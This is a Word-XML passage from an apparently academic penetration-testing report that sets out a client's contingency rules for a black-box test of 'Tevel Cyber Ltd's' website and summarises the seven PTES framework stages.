    <w:p w14:paraId="3EB138C6" w14:textId="77777777" w:rsidR="008074AF" w:rsidRDefault="008074AF" w:rsidP="008074AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B8A57B" w14:textId="77777777" w:rsidR="008074AF" w:rsidRPr="008074AF" w:rsidRDefault="008074AF" w:rsidP="008074AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B6E041" w14:textId="4125FC44" w:rsidR="0041086F" w:rsidRDefault="008074AF" w:rsidP="00267067">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do not use existing vulnerabilities within the website to pivot through the network to reveal further damaging vulnerabilities or sensitive information stored within website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BA4C7" w14:textId="77777777" w:rsidR="008074AF" w:rsidRDefault="008074AF" w:rsidP="008074AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538F726F" w14:textId="5478EB7C" w:rsidR="008074AF" w:rsidRDefault="008074AF" w:rsidP="00267067">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do not inject any malicious third party weblinks onto the website</w:t>
      </w:r>
      <w:r w:rsidR="00C91C05">
        <w:t xml:space="preserve"> using common HTTP iframe vulnerabilities or any other such vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00F34053">
        <w:t xml:space="preserve"> i.e. staff/client cookie hijacking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00161404">
        <w:t>utilsing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00161404">
        <w:t xml:space="preserve"> a XSS or SQL injection attack etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C0F5CC" w14:textId="77777777" w:rsidR="008074AF" w:rsidRDefault="008074AF" w:rsidP="008074AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD71802" w14:textId="02B6F8D0" w:rsidR="008074AF" w:rsidRDefault="008074AF" w:rsidP="00267067">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not utilise any </w:t>
      </w:r>
      <w:r w:rsidR="00AE6823">
        <w:t>third-party website or applications that may degrade website services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14615FEF" w14:textId="5CE75CFF" w:rsidR="00AE6823" w:rsidRDefault="00AE6823" w:rsidP="00AE6823">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Utilising the specific information provided by the CEO/CTO of the company, a professional penetration testing framework will be constructed to adhere to the penetration testing contingency policy, along with the approach that will be taken to</w:t>
      </w:r>
      <w:r w:rsidR="00980691">
        <w:t xml:space="preserve"> ‘Black Box’</w:t>
      </w:r>
      <w:r w:rsidR="00F74B04">
        <w:t xml:space="preserve"> penetration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> test the </w:t>
      </w:r>
      <w:r w:rsidR="00980691">
        <w:t xml:space="preserve">live </w:t>
      </w:r>
      <w:r>
        <w:t>website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4126" w14:textId="5FBF1C4F" w:rsidR="00C5650F" w:rsidRPr="002E26D8" w:rsidRDefault="00AE6823" w:rsidP="00AE6823">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>As an additional contingency, the CEO/CTO of the company will be asked to make a backup of the website in the eventuality that the website is accidently corrupted or taken offline during the test</w:t>
      </w:r>
      <w:r w:rsidR="002E26D8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4127" w14:textId="64F7C8FC" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc40134041"/>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00F876CA">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Penetration Testing Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="10E65BB8" w14:textId="3266E0C2" w:rsidR="0012247C" w:rsidRPr="0012247C" w:rsidRDefault="0012247C" w:rsidP="0046773D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A penetration testing framework outlines a structured logical approach to a security penetration test</w:t>
      </w:r>
      <w:r w:rsidR="003569F2">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD1D35">
        <w:t>that the</w:t>
      </w:r>
      <w:r w:rsidR="00BE75C1">
        <w:t xml:space="preserve"> offensive</w:t>
      </w:r>
      <w:r w:rsidR="00BD1D35">
        <w:t xml:space="preserve"> network </w:t>
      </w:r>
      <w:r w:rsidR="004E4AD2">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00BE75C1">
        <w:t xml:space="preserve"> professional</w:t>
      </w:r>
      <w:r w:rsidR="00BD1D35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t xml:space="preserve">follows to gather </w:t>
      </w:r>
      <w:r w:rsidR="00380F1F">
        <w:t xml:space="preserve">comprehensive </w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t>information (</w:t>
      </w:r>
      <w:r w:rsidR="001E6B62">
        <w:t>reconnaissance)</w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t xml:space="preserve"> about the target</w:t>
      </w:r>
      <w:r w:rsidR="003569F2">
        <w:t xml:space="preserve"> and then exploit the target using any vulnerabilities found</w:t>
      </w:r>
      <w:r w:rsidR="00380F1F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003569F2">
        <w:t>A penetration testing</w:t>
      </w:r>
      <w:r w:rsidR="00380F1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003569F2">
        <w:t>framework</w:t>
      </w:r>
      <w:r w:rsidR="00380F1F">
        <w:t xml:space="preserve"> allows the security professional</w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00380F1F">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00380F1F">
        <w:t>research any</w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t xml:space="preserve"> known exploitation tools to</w:t>
      </w:r>
      <w:r w:rsidR="00380F1F">
        <w:t xml:space="preserve"> utilise in order to</w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r w:rsidR="001E6B62">
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="001E6B62">
        <w:t xml:space="preserve"> found </w:t>
      </w:r>
      <w:r w:rsidR="00380F1F">
        <w:t xml:space="preserve">within the target </w:t>
      </w:r>
      <w:r w:rsidR="001E6B62">
        <w:t>to be utilised</w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t xml:space="preserve"> during the exploitation </w:t>
      </w:r>
      <w:r w:rsidR="001E6B62">
        <w:t xml:space="preserve">and post exploitation </w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t>stage of the penetration test</w:t>
      </w:r>
      <w:r w:rsidR="003569F2">
        <w:t xml:space="preserve"> what also allows the researcher to build a detailed report to deliver to the client after the penetration test has been concluded</w:t>
      </w:r>
      <w:r w:rsidR="0012316E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t xml:space="preserve">outlining </w:t>
      </w:r>
      <w:r w:rsidR="0012316E">
        <w:t xml:space="preserve">not only the approach and tools that were utilsed during the test but </w:t>
      </w:r>
      <w:r w:rsidR="002B653E">
        <w:t>crucially</w:t>
      </w:r>
      <w:r w:rsidR="0012316E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t>any configuration, software and/or hardware changes that can be implemented to mitigate any vulnerabil</w:t>
      </w:r>
      <w:r w:rsidR="000F4577">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="0046773D">
        <w:t>ies within a network and/or software/website application</w:t>
      </w:r>
      <w:r w:rsidR="002B653E">
        <w:t xml:space="preserve"> to secure their network/application from malicious actors whom wish to steal sensitive information stored within the network for monitory and/or political gain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4129" w14:textId="1F32B767" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc40134042"/>
      <w:r>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r w:rsidR="008A07B8" w:rsidRPr="008A07B8">
        <w:t>Penetration Testing Execution Standard (PTES)</w:t>
      </w:r>
      <w:r w:rsidR="008A07B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00936EBB">
        <w:t>Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="789714AC" w14:textId="52CD7F5B" w:rsidR="00936EBB" w:rsidRDefault="00936EBB" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The PTES framework</w:t>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"The \"Penetration Testing Execution Standard\" is a new standard designed to provide both businesses and security service providers with a common language and scope for performing penetration testing (i.e. Security evaluations). It started early in 2009 following a discussion that sparked between some of the founding members over the value (or lack of) of penetration testing in the industry.","author":[{"dropping-particle":"","family":"Chris","given":"Nickerson","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"David","given":"Kennedy","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Reil","given":"Chris John Ril","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"2014","id":"ITEM-1","issued":{"date-parts":[["2009"]]},"title":"The Penetration Testing Execution Standard","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=86656968-304c-4fa5-be65-499ffc343a76"]}],"mendeley":{"formattedCitation":"[99]","plainTextFormattedCitation":"[99]","previouslyFormattedCitation":"[99]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00167EC1" w:rsidRPr="00167EC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[99]</w:t>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a professional standard for conducting ‘Black Box’ penetration tests that consists of the </w:t>
      </w:r>
      <w:r w:rsidR="0062249B">
        <w:t>seven</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stages to conduct a thorough and professional penetration test that outlines the stages that should be followed for a systematic approach to leverage a ‘Black Box’ penetration test.</w:t>
      </w:r>
      <w:r w:rsidR="0062249B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B38265" w14:textId="5D36E8F8" w:rsidR="00936EBB" w:rsidRDefault="00936EBB" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>These stages are;</w:t>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"The \"Penetration Testing Execution Standard\" is a new standard designed to provide both businesses and security service providers with a common language and scope for performing penetration testing (i.e. Security evaluations). It started early in 2009 following a discussion that sparked between some of the founding members over the value (or lack of) of penetration testing in the industry.","author":[{"dropping-particle":"","family":"Nickerson","given":"Chris","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kennedy","given":"David","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Reil","given":"Chris John","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"2014","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"The Penetration Testing Execution Standard","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=1826d629-d4b6-4ec3-92f9-baada35d1189"]}],"mendeley":{"formattedCitation":"[100]","plainTextFormattedCitation":"[100]","previouslyFormattedCitation":"[100]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00167EC1" w:rsidRPr="00167EC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[100]</w:t>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45104C27" w14:textId="127EFCCC" w:rsidR="0044629D" w:rsidRDefault="00FE2888" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE2888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-engagement Interactions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="0097658F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0097658F">
        <w:t>This stage outlines the interactions with the customer/client before the penetration test begins</w:t>
      </w:r>
      <w:r w:rsidR="0044629D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0097658F">
        <w:t xml:space="preserve"> to agree on the timeline in which the test will take place</w:t>
      </w:r>
      <w:r w:rsidR="0044629D">
        <w:t xml:space="preserve"> and the security concerns they may have about their website/network/software application etc</w:t>
      </w:r>
      <w:r w:rsidR="0097658F">
        <w:t xml:space="preserve"> along with any preconditions the client may have about penetration testing that is outlines within a contingency policy that was highlighted within the previous section of this report. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1549BD" w14:textId="1D57B696" w:rsidR="00FE2888" w:rsidRPr="0097658F" w:rsidRDefault="0097658F" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The penetration tools that will be utilised during the attack also needs to be highlighted at this point </w:t>
      </w:r>
      <w:r w:rsidR="0044629D">
        <w:t xml:space="preserve">to the customer/client </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">so that the </w:t>
      </w:r>
      <w:r w:rsidR="009025A2">
        <w:t>company’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTO</w:t>
      </w:r>
      <w:r w:rsidR="0044629D">
        <w:t xml:space="preserve"> or network security engineer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can evaluate and approve or reject the us</w:t>
      </w:r>
      <w:r w:rsidR="0044629D">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of them within their network/software application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBAC728" w14:textId="34F4BA94" w:rsidR="00FE2888" w:rsidRDefault="00FE2888" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE2888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intelligence Gathering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00496570" w:rsidRPr="00496570">
        <w:t xml:space="preserve"> This stage of the penetration attack utilises automated and/or manual tools and techniques to identify information about the company such as</w:t>
      </w:r>
      <w:r w:rsidR="00496570">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00496570" w:rsidRPr="00496570">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00496570">
        <w:t>company,</w:t>
      </w:r>
      <w:r w:rsidR="00496570" w:rsidRPr="00496570">
        <w:t xml:space="preserve"> employees, </w:t>
      </w:r>
      <w:r w:rsidR="00496570">
        <w:t>E-M</w:t>
      </w:r>
      <w:r w:rsidR="00496570" w:rsidRPr="00496570">
        <w:t>ail domains</w:t>
      </w:r>
      <w:r w:rsidR="00F77392" w:rsidRPr="00F77392">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F77392">
        <w:t>and addresses, hidden unsecure website pages</w:t>
      </w:r>
      <w:r w:rsidR="00496570" w:rsidRPr="00496570">
        <w:t>, Internet Protocol (IP) addressing and vulnerabilities identified</w:t>
      </w:r>
      <w:r w:rsidR="00496570">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00496570" w:rsidRPr="00496570">
        <w:t xml:space="preserve">within the target </w:t>
      </w:r>
      <w:r w:rsidR="00F77392" w:rsidRPr="00496570">
        <w:t>companies</w:t>
      </w:r>
      <w:r w:rsidR="00496570" w:rsidRPr="00496570">
        <w:t xml:space="preserve"> network/software and/or website application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF27C3" w14:textId="3A288384" w:rsidR="00496570" w:rsidRPr="00FE2888" w:rsidRDefault="00496570" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Due to the contingency policy in place gathered from the pre-</w:t>
      </w:r>
      <w:r w:rsidR="00F77392">
        <w:t>engagement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> interaction with the client </w:t>
      </w:r>
      <w:r w:rsidR="009025A2" w:rsidRPr="00D45019">
        <w:t>Dr</w:t>
      </w:r>
      <w:r w:rsidR="009025A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009025A2" w:rsidRPr="00D45019">
        <w:t>Harish Ramani</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009025A2">
        <w:t xml:space="preserve">(CEO/CTO) </w:t>
      </w:r>
      <w:r w:rsidR="00F77392">
        <w:t>only a website vulnerability assessment will take place on the target website as instructed by the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217707CD" w14:textId="41FF2084" w:rsidR="00FE2888" w:rsidRDefault="00FE2888" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE2888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Threat Modelling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00F77392">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA5713" w:rsidRPr="00EA5713">
        <w:t xml:space="preserve">This stage focuses on identifying key business assets that need to be protected within the company that may be exposed that should be the primary objective </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA5713" w:rsidRPr="00EA5713">
        <w:t>od</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA5713" w:rsidRPr="00EA5713">
        <w:t xml:space="preserve"> the penetration test during the given timeframe such as; backend databases containing sensitive information, exposed company information i.e. E-Mail addresses, staff names etc whom may be vulnerable to be targeted by malicious actors. If time permits, secondary targets should be identified after the primary targets have been analysed. This stage allows a client to identify their most valuable vulnerable assets within the company with the allotted penetration testing budget.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A803DE0" w14:textId="0987AE42" w:rsidR="00EA5713" w:rsidRPr="00EA5713" w:rsidRDefault="00155D1D" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The penetration</w:t>
      </w:r>
      <w:r w:rsidR="00EA5713">
        <w:t xml:space="preserve"> test for </w:t>
      </w:r>
      <w:r w:rsidR="0062249B">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA5713">
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA5713">
        <w:t xml:space="preserve"> Cyber Ltd</w:t>
      </w:r>
      <w:r w:rsidR="0062249B">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00EA5713">
        <w:t xml:space="preserve"> will focus on the website as instructed by the client with the primary focus on the backend database assets of the company along with protecting </w:t>
      </w:r>
      <w:r w:rsidR="000F208D">
        <w:t xml:space="preserve">website </w:t>
      </w:r>
      <w:r w:rsidR="00EA5713">
        <w:t xml:space="preserve">frontend </w:t>
      </w:r>
      <w:r w:rsidR="000F208D">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00EA5713">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F208D">
        <w:t>that may be exposed such as; unsecure hidden pages, HTML coding errors i.e. iframes being enables and exposed etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E72F4C6" w14:textId="24BD385B" w:rsidR="00FE2888" w:rsidRPr="007B3922" w:rsidRDefault="00FE2888" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE2888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="009D0C4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B3922">
        <w:t>Utilising the information garnered from the information gathering stage, vulnerability analysis focuses on the information such as; exposed ports and vulnerabilities identified within a website/software application</w:t>
      </w:r>
      <w:r w:rsidR="00871B32">
        <w:t xml:space="preserve"> with the primary focus being within the primary and secondary assets identified within the threat modelling stage of the test. These potential security vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="007B3922">
        <w:t xml:space="preserve"> can then be researched by the network security offensive engineer to identify any known exploits that can be leveraged against the </w:t>
      </w:r>
      <w:r w:rsidR="00871B32">
        <w:t>possible</w:t>
      </w:r>
      <w:r w:rsidR="007B3922">
        <w:t xml:space="preserve"> vulnerabilities during the exploitation stage of the security test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B253DB3" w14:textId="50FFBAF7" w:rsidR="00FE2888" w:rsidRPr="00871B32" w:rsidRDefault="00FE2888" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE2888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00871B32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00871B32" w:rsidRPr="00871B32">
        <w:t xml:space="preserve">This stage focuses on exploiting vulnerabilities identified </w:t>
      </w:r>
      <w:r w:rsidR="00871B32">
        <w:t xml:space="preserve">and researched during the </w:t>
      </w:r>
      <w:r w:rsidR="00871B32" w:rsidRPr="00871B32">
        <w:t>vulnerability assessment stage</w:t>
      </w:r>
      <w:r w:rsidR="00871B32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00871B32" w:rsidRPr="00871B32">
        <w:t>of the penetration test to ascertain</w:t>
      </w:r>
      <w:r w:rsidR="00871B32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00871B32">
        <w:t>whether they can be exploited</w:t>
      </w:r>
      <w:r w:rsidR="00343E00">
        <w:t xml:space="preserve"> by bypassing security measures</w:t>
      </w:r>
      <w:r w:rsidR="00307862">
        <w:t xml:space="preserve"> or inept configuration/coding errors</w:t>
      </w:r>
      <w:r w:rsidR="00343E00">
        <w:t xml:space="preserve"> put in place</w:t>
      </w:r>
      <w:r w:rsidR="00307862">
        <w:t xml:space="preserve"> by the clients network and security engineers</w:t>
      </w:r>
      <w:r w:rsidR="00343E00">
        <w:t xml:space="preserve"> to access the system</w:t>
      </w:r>
      <w:r w:rsidR="00307862">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00871B32">
        <w:t xml:space="preserve"> and if so what level of information and/or access can be garnered from the vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBCD9E9" w14:textId="68A1240D" w:rsidR="00FE2888" w:rsidRDefault="00FE2888" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE2888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="002177C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE22C8">
        <w:t xml:space="preserve">This stage of the penetration test focuses on utilising the exploits leveraged within the exploitation stage of the penetration test to pivot through the network to further access sensitive information along with attempting to create a persistent backdoor for future exploitation after the initial exploits have been patched. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0FED6" w14:textId="6EEC8262" w:rsidR="00EE22C8" w:rsidRPr="002C5604" w:rsidRDefault="00EE22C8" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The contingency policy agreed with ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cyber</w:t>
      </w:r>
      <w:r w:rsidR="00D53DF8">
        <w:t xml:space="preserve"> Ltd </w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00D53DF8">
        <w:t xml:space="preserve"> CEO/CTO during the pre-engagement interaction stage of the penetration test</w:t>
      </w:r>
      <w:r w:rsidR="00CB4FDF">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> explicitly denies</w:t>
      </w:r>
      <w:r w:rsidR="00D53DF8">
        <w:t>/outlines</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> any pivoting of the network or installation of malware and/or creation of backdoors within their website. Therefore, this stage of the penetration test will not </w:t>
      </w:r>
      <w:r w:rsidR="00905326">
        <w:t>be conducted</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
